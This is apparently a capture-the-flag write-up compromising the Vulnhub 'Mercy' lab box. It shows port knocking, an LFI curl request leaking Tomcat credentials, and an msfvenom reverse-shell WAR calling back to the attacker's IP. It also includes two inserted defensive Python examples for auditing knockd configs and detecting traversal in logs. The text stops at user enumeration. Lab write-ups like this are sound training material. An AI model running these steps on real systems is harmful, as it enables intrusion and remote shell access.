Vulnhub | digitalworld.local - Mercy

In this post, I cover the steps I took to fully compromise the Mercy box in the Digital World series.
In: Vulnhub, TJ Null OSCP Practice, OSCP Prep, Attack, CTF

Nmap Scan

# Nmap 7.91 scan initiated Sun Sep 19 19:05:11 2021 as: nmap -T4 -p- -A -oA scan-advanced 10.9.9.23  
Nmap scan report for MERCY.cyber.range (10.9.9.23)  
Host is up (0.00043s latency).  
Not shown: 65525 closed ports  
PORT     STATE    SERVICE     VERSION  
22/tcp   filtered ssh  
53/tcp   open     domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)  
| dns-nsid:    
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu  
80/tcp   filtered http  
110/tcp  open     pop3        Dovecot pop3d  
|_pop3-capabilities: UIDL SASL TOP AUTH-RESP-CODE RESP-CODES PIPELINING CAPA STLS  
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server  
| Not valid before: 2018-08-24T13:22:55  
|_Not valid after:  2028-08-23T13:22:55  
|_ssl-date: TLS randomness does not represent time  
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)  
143/tcp  open     imap        Dovecot imapd (Ubuntu)  
|_imap-capabilities: IDLE OK listed LOGIN-REFERRALS have more post-login capabilities ID STARTTLS Pre-login SASL-IR LITERAL+ ENABLE IMAP4rev1 LOGINDISABLEDA0001  
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server  
| Not valid before: 2018-08-24T13:22:55  
|_Not valid after:  2028-08-23T13:22:55  
|_ssl-date: TLS randomness does not represent time  
445/tcp  open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)  
993/tcp  open     ssl/imap    Dovecot imapd (Ubuntu)  
|_imap-capabilities: IDLE OK listed LOGIN-REFERRALS have AUTH=PLAINA0001 more ID Pre-login SASL-IR capabilities LITERAL+ ENABLE IMAP4rev1 post-login  
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server  
| Not valid before: 2018-08-24T13:22:55  
|_Not valid after:  2028-08-23T13:22:55  
|_ssl-date: TLS randomness does not represent time  
995/tcp  open     ssl/pop3    Dovecot pop3d  
|_pop3-capabilities: UIDL USER SASL(PLAIN) AUTH-RESP-CODE RESP-CODES PIPELINING CAPA TOP  
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server  
| Not valid before: 2018-08-24T13:22:55  
|_Not valid after:  2028-08-23T13:22:55  
|_ssl-date: TLS randomness does not represent time  
8080/tcp open     http        Apache Tomcat/Coyote JSP engine 1.1  
| http-methods:    
|_  Potentially risky methods: PUT DELETE  
|_http-open-proxy: Proxy might be redirecting requests  
| http-robots.txt: 1 disallowed entry    
|_/tryharder/tryharder  
|_http-server-header: Apache-Coyote/1.1  
|_http-title: Apache Tomcat  
Device type: general purpose  
Running: Linux 3.X|4.X  
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4  
OS details: Linux 3.11 - 4.1  
Network Distance: 2 hops  
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel  
  
Host script results:  
|_clock-skew: mean: -2h40m01s, deviation: 4h37m07s, median: -1s  
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)  
| smb-os-discovery:    
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)  
|   Computer name: mercy  
|   NetBIOS computer name: MERCY\x00  
|   Domain name: \x00  
|   FQDN: mercy  
|_  System time: 2021-09-20T07:05:26+08:00  
| smb-security-mode:    
|   account_used: guest  
|   authentication_level: user  
|   challenge_response: supported  
|_  message_signing: disabled (dangerous, but default)  
| smb2-security-mode:    
|   2.02:    
|_    Message signing enabled but not required  
| smb2-time:    
|   date: 2021-09-19T23:05:26  
|_  start_date: N/A  
  
TRACEROUTE (using port 199/tcp)  
HOP RTT     ADDRESS  
1   0.22 ms pfSense.cyber.range (10.0.0.1)  
2   0.38 ms MERCY.cyber.range (10.9.9.23)  
  
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
# Nmap done at Sun Sep 19 19:05:35 2021 -- 1 IP address (1 host up) scanned in 24.70 seconds




Service Enumeration

SMB

target=10.9.9.23
smbclient -L //$target --option="client min protocol=core" -U ''

Attempt to anonymously enumerate shares

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        qiu             Disk      
        IPC$            IPC       IPC Service (MERCY server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP             

I am able to list some shares, but I do not have anonymous access to any of them. However, I do have a credential from a previous box in the series.

  • Username: qiu
  • Password: password
smbclient //$target/qiu --option="client min protocol=core" -U 'qiu'

I am able to map the qiu share and take a look around. There is a config file in the share, which appears to have the configurations for several services on the target.

Here are settings for your perusal.

Port Knocking Daemon Configuration

[options]
	UseSyslog

[openHTTP]
	sequence    = 159,27391,4
	seq_timeout = 100
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
	tcpflags    = syn

[closeHTTP]
	sequence    = 4,27391,159
	seq_timeout = 100
	command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
	tcpflags    = syn

[openSSH]
	sequence    = 17301,28504,9999
	seq_timeout = 100
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn

[closeSSH]
	sequence    = 9999,28504,17301
	seq_timeout = 100
	command     = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn

Apache2 Configuration

# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.4/ for detailed information about
# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
# hints.
#
#
# Summary of how the Apache 2 configuration works in Debian:
# The Apache 2 web server configuration in Debian is quite different to
# upstream's suggested way to configure the web server. This is because Debian's
# default Apache2 installation attempts to make adding and removing modules,
# virtual hosts, and extra configuration directives as flexible as possible, in
# order to make automating the changes and administering the server as easy as
# possible.

# It is split into several files forming the configuration hierarchy outlined
# below, all located in the /etc/apache2/ directory:
#
#	/etc/apache2/
#	|-- apache2.conf
#	|	`--  ports.conf
#	|-- mods-enabled
#	|	|-- *.load
#	|	`-- *.conf
#	|-- conf-enabled
#	|	`-- *.conf
# 	`-- sites-enabled
#	 	`-- *.conf
#
#
# * apache2.conf is the main configuration file (this file). It puts the pieces
#   together by including all remaining configuration files when starting up the
#   web server.
#
# * ports.conf is always included from the main configuration file. It is
#   supposed to determine listening ports for incoming connections which can be
#   customized anytime.
#
# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
#   directories contain particular configuration snippets which manage modules,
#   global configuration fragments, or virtual host configurations,
#   respectively.
#
#   They are activated by symlinking available configuration files from their
#   respective *-available/ counterparts. These should be managed by using our
#   helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
#   their respective man pages for detailed information.
#
# * The binary is called apache2. Due to the use of environment variables, in
#   the default configuration, apache2 needs to be started/stopped with
#   /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
#   work with the default configuration.


# Global configuration
#

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE!  If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the Mutex documentation (available
# at <URL:http://httpd.apache.org/docs/2.4/mod/core.html#mutex>);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
#ServerRoot "/etc/apache2"

#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
Mutex file:${APACHE_LOCK_DIR} default

#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}

#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300

#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On

#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100

#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 5


# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}

#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off

# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a <VirtualHost>
# container, error messages relating to that virtual host will be
# logged here.  If you *do* define an error logfile for a <VirtualHost>
# container, that host's errors will be logged there and not here.
#
ErrorLog ${APACHE_LOG_DIR}/error.log

#
# LogLevel: Control the severity of messages logged to the error_log.
# Available values: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the log level for particular modules, e.g.
# "LogLevel info ssl:warn"
#
LogLevel warn

# Include module configuration:
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf

# Include list of ports to listen on
Include ports.conf


# Sets the default security model of the Apache2 HTTPD server. It does
# not allow access to the root filesystem outside of /usr/share and /var/www.
# The former is used by web applications packaged in Debian,
# the latter may be used for local directories served by the web server. If
# your system is serving content from a sub-directory in /srv you must allow
# access here, or in any related virtual host.
<Directory />
	Options FollowSymLinks
	AllowOverride None
	Require all denied
</Directory>

<Directory /usr/share>
	AllowOverride None
	Require all granted
</Directory>

<Directory /var/www/>
	Options Indexes FollowSymLinks
	AllowOverride None
	Require all granted
</Directory>

#<Directory /srv/>
#	Options Indexes FollowSymLinks
#	AllowOverride None
#	Require all granted
#</Directory>




# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives.  See also the AllowOverride
# directive.
#
AccessFileName .htaccess

#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
<FilesMatch "^\.ht">
	Require all denied
</FilesMatch>


#
# The following directives define some format nicknames for use with
# a CustomLog directive.
#
# These deviate from the Common Log Format definitions in that they use %O
# (the actual bytes sent including headers) instead of %b (the size of the
# requested file), because the latter makes it impossible to detect partial
# requests.
#
# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
# Use mod_remoteip instead.
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent

# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.

# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf

# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

Samba Configuration

#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which 
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
#  - When such options are commented with ";", the proposed setting
#    differs from the default Samba behaviour
#  - When commented with "#", the proposed setting is the default
#    behaviour of Samba but the option is considered important
#    enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic 
# errors. 

#======================= Global Settings =======================

[global]

## Browsing/Identification ###

# Change this to the workgroup/NT-domain name your Samba server will part of
   workgroup = WORKGROUP

# server string is the equivalent of the NT Description field
	server string = %h server (Samba, Ubuntu)

# Windows Internet Name Serving Support Section:
# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
#   wins support = no

# WINS Server - Tells the NMBD components of Samba to be a WINS Client
# Note: Samba can be either a WINS Server, or a WINS Client, but NOT both
;   wins server = w.x.y.z

# This will prevent nmbd to search for NetBIOS names through DNS.
   dns proxy = no

#### Networking ####

# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
;   interfaces = 127.0.0.0/8 eth0

# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself.  However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
;   bind interfaces only = yes



#### Debugging/Accounting ####

# This tells Samba to use a separate log file for each machine
# that connects
   log file = /var/log/samba/log.%m

# Cap the size of the individual log files (in KiB).
   max log size = 1000

# If you want Samba to only log through syslog then set the following
# parameter to 'yes'.
#   syslog only = no

# We want Samba to log a minimum amount of information to syslog. Everything
# should go to /var/log/samba/log.{smbd,nmbd} instead. If you want to log
# through syslog you should set the following parameter to something higher.
   syslog = 0

# Do something sensible when Samba crashes: mail the admin a backtrace
   panic action = /usr/share/samba/panic-action %d


####### Authentication #######

# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller". 
#
# Most people will want "standalone sever" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
   server role = standalone server

# If you are using encrypted passwords, Samba will need to know what
# password database type you are using.  
   passdb backend = tdbsam

   obey pam restrictions = yes

# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
   unix password sync = yes

# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
   passwd program = /usr/bin/passwd %u
   passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .

# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
   pam password change = yes

# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
   map to guest = bad user

########## Domains ###########

#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set 
#

# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
;   logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
#   logon path = \\%N\%U\profile

# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
;   logon drive = H:
#   logon home = \\%N\%U

# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
;   logon script = logon.cmd

# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe.  The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u

# This allows machine accounts to be created on the domain controller via the 
# SAMR RPC pipe.  
# The following assumes a "machines" group exists on the system
; add machine script  = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u

# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.  
; add group script = /usr/sbin/addgroup --force-badname %g

############ Misc ############

# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
;   include = /home/samba/etc/smb.conf.%m

# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
;   idmap uid = 10000-20000
;   idmap gid = 10000-20000
;   template shell = /bin/bash

# Setup usershare options to enable non-root users to share folders
# with the net usershare command.

# Maximum number of usershare. 0 (default) means that usershare is disabled.
;   usershare max shares = 100

# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
   usershare allow guests = yes

#======================= Share Definitions =======================

# Un-comment the following (and tweak the other settings below to suit)
# to enable the default home directory shares. This will share each
# user's home directory as \\server\username
;[homes]
;   comment = Home Directories
;   browseable = no

# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
;   read only = yes

# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
;   create mask = 0700

# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
;   directory mask = 0700

# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# Un-comment the following parameter to make sure that only "username"
# can connect to \\server\username
# This might need tweaking when using external authentication schemes
;   valid users = %S

# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
;   comment = Network Logon Service
;   path = /home/samba/netlogon
;   guest ok = yes
;   read only = yes

# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
;   comment = Users profiles
;   path = /home/samba/profiles
;   guest ok = no
;   browseable = no
;   create mask = 0600
;   directory mask = 0700

[printers]
   comment = All Printers
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no
   read only = yes
   create mask = 0700

# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
;   write list = root, @lpadmin

[qiu]
path = /home/qiu
valid users = qiu
read only = yes

For other details of MERCY, please contact your system administrator.




HTTP (TCP/80)

I used the port knock sequence discovered in the SMB enumeration to open port TCP 80.
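Seen from the defender's side, the knockd configuration recovered from the share can be checked mechanically. The following is an added example, not part of the original post: it parses the config exactly as shown above and reports doors whose knock is a fixed sequence (no knockd `one_time_sequences` file), commands that name a chain that is not a built-in filter chain, and open rules that no close door removes. The finding labels and function names are made up for this example.

```python
import re

# knockd.conf as recovered from the share (copied from the page above).
KNOCKD_CONF = """
[options]
    UseSyslog

[openHTTP]
    sequence    = 159,27391,4
    seq_timeout = 100
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
    tcpflags    = syn

[closeHTTP]
    sequence    = 4,27391,159
    seq_timeout = 100
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
    tcpflags    = syn

[openSSH]
    sequence    = 17301,28504,9999
    seq_timeout = 100
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9999,28504,17301
    seq_timeout = 100
    command     = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""

# Built-in chains of the iptables filter table. Chain names are case-sensitive.
BUILTIN_CHAINS = {"INPUT", "FORWARD", "OUTPUT"}


def parse_knockd(text):
    """Parse knockd.conf text into {section: {lowercased key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = sections.setdefault(header.group(1), {})
        elif current is not None:
            key, _, value = line.partition("=")
            current[key.strip().lower()] = value.strip()
    return sections


def parse_rule(command):
    """Return (action, chain, rule_spec) for an iptables -I/-A/-D command, else None."""
    m = re.search(r"iptables\s+-([IAD])\s+(\S+)\s+(.+)", command)
    return (m.group(1), m.group(2), " ".join(m.group(3).split())) if m else None


def audit(sections):
    """Return a list of (door, finding) tuples in config order."""
    doors = {name: (sec, parse_rule(sec["command"]))
             for name, sec in sections.items() if "command" in sec}
    # Every (chain, rule_spec) that some door deletes.
    deletes = {rule[1:] for _, rule in doors.values() if rule and rule[0] == "D"}
    findings = []
    for name, (sec, rule) in doors.items():
        if rule is None:
            continue
        action, chain, spec = rule
        if chain not in BUILTIN_CHAINS:
            # Unless a user-defined chain with this exact name exists,
            # iptables rejects the command and the ruleset is unchanged.
            findings.append((name, "unknown-chain"))
        if action in ("I", "A"):
            if "one_time_sequences" not in sec:
                # Fixed knock: anyone who can read this file can replay it.
                findings.append((name, "static-sequence"))
            if (chain, spec) not in deletes:
                # No door removes this exact rule, so the port stays open.
                findings.append((name, "no-matching-delete"))
    return findings


if __name__ == "__main__":
    for door, finding in audit(parse_knockd(KNOCKD_CONF)):
        print(f"{door}: {finding}")
```

On this config the audit reports both open doors as static sequences and shows that the `iNPUT` chain name in closeSSH leaves the SSH accept rule with nothing to remove it.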





Gobuster Enumeration

gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 100 -o gobuster-out -x php,html

/index.html           (Status: 200) [Size: 90]
/time                 (Status: 200) [Size: 79]
/login.html           (Status: 200) [Size: 67]




robots.txt

User-agent: *
Disallow: /mercy
Disallow: /nomercy

/nomercy

Check the page: http://10.9.9.23/nomercy

Looking at the version of this application in searchsploit, it should be vulnerable to Local File Inclusion (LFI).

RIPS 0.53 - Multiple Local File Inclusions | php/webapps/18660.txt

Try reading the local tomcat7 configuration, which reveals a login credential:

curl http://10.9.9.23/nomercy/windows/code.php?file=../../../../../../../../../var/lib/tomcat7/conf/tomcat-users.xml

<user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>

<user username="fluffy" password="freakishfluffybunny" roles="none"/>

Bonus, I even found it's susceptible to Remote File Inclusion (RFI) – notice the address bar in the image:
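Both requests above leave a recognizable trace in the web server's access log. The following is an added detection example, not part of the original post: it scans lines in the "combined" LogFormat from the Apache configuration shown earlier and flags query parameters that, after undoing repeated percent-encoding, contain a `..` path segment or a URL scheme. The log lines are constructed for the example, and the check covers every query parameter rather than only `file`, so legitimate URL-valued parameters in other applications would need allow-listing.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache "combined" format (not taken from the target).
SAMPLE_LOG = '''\
10.0.0.2 - - [19/Sep/2021:19:41:07 -0400] "GET /nomercy/windows/code.php?file=../../../../../../../../../var/lib/tomcat7/conf/tomcat-users.xml HTTP/1.1" 200 1912 "-" "curl/7.74.0"
10.0.0.2 - - [19/Sep/2021:19:42:30 -0400] "GET /nomercy/windows/code.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1620 "-" "curl/7.74.0"
10.0.0.2 - - [19/Sep/2021:19:44:12 -0400] "GET /nomercy/windows/code.php?file=http://10.0.0.2/probe.txt HTTP/1.1" 200 40 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Sep/2021:19:45:00 -0400] "GET /nomercy/windows/code.php?file=index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Sep/2021:19:45:03 -0400] "GET /login.html HTTP/1.1" 200 67 "-" "Mozilla/5.0"
'''.splitlines()

# %h %l %u %t "%r" %>s ... : client, request method, request target, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)


def decode_fully(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %252e -> %2e -> '.')."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """Return 'remote-include', 'path-traversal' or None for one parameter value."""
    value = decode_fully(value)
    if SCHEME_RE.match(value):
        return "remote-include"
    # Split on both separators so ..\ is caught as well as ../
    if ".." in re.split(r"[\\/]", value):
        return "path-traversal"
    return None


def scan(lines):
    """Return one hit per suspicious query parameter found in the log lines."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        query = urlsplit(target).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                hits.append({
                    "client": client,
                    "status": int(status),  # 200 means the include succeeded
                    "param": param,
                    "kind": kind,
                    "value": decode_fully(value),
                })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```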





HTTP (TCP/8080)





Gobuster Enumeration

gobuster dir -u http://$target:8080 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 100 -o gobuster-out -x php,html

/docs                 (Status: 302) [Size: 0] [--> http://10.9.9.23:8080/docs/]  
/index.html           (Status: 200) [Size: 1895]  
/examples             (Status: 302) [Size: 0] [--> http://10.9.9.23:8080/examples/]  
/manager              (Status: 302) [Size: 0] [--> http://10.9.9.23:8080/manager/]  
/http%3A%2F%2Fwww     (Status: 400) [Size: 0]  
/http%3A%2F%2Fwww.php (Status: 400) [Size: 0]  
/http%3A%2F%2Fwww.html (Status: 400) [Size: 0]




robots.txt

/tryharder/tryharder

http://10.9.9.23:8080/tryharder/tryharder is just a file with some Base64-encoded text. I run the following command to decode it:

curl http://$target:8080/tryharder/tryharder | base64 -d

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.




Tomcat Manager

The enumeration on TCP 80 revealed a credential to log in to the Tomcat Web Application Manager. I navigate to http://10.9.9.23:8080/manager and sign in with the credential fluffy:freakishfluffybunny.





SSH

I used the port knock sequence to open the SSH port, but none of the credentials I had discovered were valid logins.





Exploit

Overview

Credentials discovered on a previous box in the series, which were guessable to begin with, exposed configuration files in an SMB share. Using information from the configuration file, I sent the port knocking sequence to open the SSH and HTTP ports.

I found an LFI bug in the web application running on TCP 80, which allowed me to read the Tomcat configuration file. Cleartext credentials hardcoded in the tomcat-users.xml file allowed access to the Tomcat Manager, where a malicious WAR file was uploaded to obtain a reverse shell.





Malicious WAR File

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.2 LPORT=443 -f war -o shell.war
Upload and deploy

Start a netcat listener on TCP 443, click the /shell link and catch the reverse shell.





Post-Exploitation

Environment

Current User

id
uid=116(tomcat7) gid=126(tomcat7) groups=126(tomcat7)

sudo -l
Sorry, user tomcat7 may not run sudo on MERCY.




OS and Kernel

uname -a
Linux MERCY 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux


cat /etc/*release

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"




Users and Groups

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
landscape:x:102:105::/var/lib/landscape:/bin/false
mysql:x:103:107:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:104:109::/var/run/dbus:/bin/false
bind:x:105:116::/var/cache/bind:/bin/false
postfix:x:106:117::/var/spool/postfix:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
dovecot:x:108:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:109:120:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:111:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
avahi:x:112:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:113:124:colord colour management daemon,,,:/var/lib/colord:/bin/false
libvirt-qemu:x:114:108:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:115:125:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
tomcat7:x:116:126::/usr/share/tomcat7:/bin/false
pleadformercy:x:1000:1000:pleadformercy:/home/pleadformercy:/bin/bash
qiu:x:1001:1001:qiu:/home/qiu:/bin/bash
thisisasuperduperlonguser:x:1002:1002:,,,:/home/thisisasuperduperlonguser:/bin/bash
